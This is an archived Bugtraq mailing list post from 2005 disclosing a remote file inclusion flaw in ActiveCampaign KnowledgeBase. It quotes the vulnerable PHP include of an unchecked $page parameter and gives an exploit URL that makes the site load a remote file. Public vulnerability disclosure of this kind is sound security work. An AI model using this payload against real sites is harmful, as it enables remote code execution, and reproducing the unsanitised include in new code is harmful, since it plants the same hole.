Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

KnowledgeBase
From: Francisco Alisson <dominusvis () click21 com br>
Date: 12 Mar 2005 12:15:47 -0000


Remote File Inclusion

KnowledgeBase
Vendor: www.activecampaign.com/kb/

Well, inside the index.php file we can see:

if ($page == ""){
 $page = "startup";
}
 @include("$page.php");
?>

After I tested some sites with kb I got file inclusion:
http://www.site.com/kb/index.php?page=http://[file]

Dominus_Vis
[Infektion Group]

  By Date           By Thread  

Current thread:
  • KnowledgeBase Francisco Alisson (Mar 12)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]